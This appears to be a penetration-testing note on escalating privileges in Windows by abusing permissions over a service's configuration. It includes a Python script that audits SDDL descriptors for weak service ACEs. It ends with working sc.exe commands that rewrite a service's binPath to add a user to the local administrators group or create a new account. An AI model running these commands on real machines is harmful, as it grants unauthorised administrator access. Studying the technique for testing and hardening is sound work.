Abusing permissions over a service configuration
The following actions succeed only if these conditions are met:
- GenericWrite / GenericAll / SERVICE_CHANGE_CONFIG permission on the service
- The service is set to auto-start, or we have permission to start/restart it
Check for permissions to modify service configuration
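An audit-side version of this check, as an added example (not code from the original page): it parses service security descriptors in the SDDL form printed by `sc.exe sdshow <service name>` and reports allow ACEs that give a low-privileged trustee one of the three rights listed in the conditions above, plus whether that trustee can also start the service. The `SAMPLES` strings, the service names in them and the `LOW_PRIV` trustee set are constructed assumptions.

```python
import re

# SDDL right codes and access-mask bits as they apply to service objects.
CHANGE_CODES = {"DC": "SERVICE_CHANGE_CONFIG", "GW": "GenericWrite", "GA": "GenericAll"}
CHANGE_BITS = {0x2: "SERVICE_CHANGE_CONFIG", 0x40000000: "GenericWrite", 0x10000000: "GenericAll"}
START_CODE, START_BIT = "RP", 0x10  # SERVICE_START
# Assumption: trustees treated as low-privileged; adjust per environment.
LOW_PRIV = {"WD": "Everyone", "AU": "Authenticated Users", "BU": "Builtin Users",
            "IU": "Interactive", "DU": "Domain Users"}
# Constructed sample input, in the form printed by `sc.exe sdshow <service name>`.
SAMPLES = {
    "HardenedSvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "WeakSvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)",
}

def risky_aces(sddl):
    """Return allow ACEs in the DACL that let a low-privileged trustee change the service config."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)  # DACL only; the SACL (S:) is skipped
    if not dacl:
        return []
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1)):
        fields = ace.split(";")  # type;flags;rights;object;inherit_object;trustee
        if len(fields) < 6 or fields[0] != "A":
            continue
        rights, trustee = fields[2], fields[5]
        if trustee not in LOW_PRIV:
            continue
        if rights.lower().startswith("0x"):  # rights written as a hex access mask
            mask = int(rights, 16)
            granted = [name for bit, name in CHANGE_BITS.items() if mask & bit]
            can_start = bool(mask & START_BIT)
        else:
            # Split into two-letter codes; a substring search would misread "SD"+"CC" as "DC".
            codes = re.findall("..", rights)
            granted = [name for code, name in CHANGE_CODES.items() if code in codes]
            can_start = START_CODE in codes
        if granted:
            findings.append({"trustee": LOW_PRIV[trustee], "rights": granted,
                             "can_start": can_start or "GenericAll" in granted})
    return findings

if __name__ == "__main__":
    for name, sddl in SAMPLES.items():
        print(name, risky_aces(sddl) or "no low-privileged change-config ACE")
```

Any service this flags should have the ACE removed or narrowed to the accounts that actually administer it.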
Replace binPath of service with a command
If you have permission to change the configuration of a service, you can replace the path that points to its binary with a command. The typical PoC is to add a user (usually one that we control) to the local admin group, or alternatively, to create a new user and add it to the local admin group.
sc.exe config <service name> binPATH= "cmd.exe /c net localgroup administrators <User> /add"
sc.exe config <service name> binPATH= "cmd.exe /c net user <User> <Password>! /add"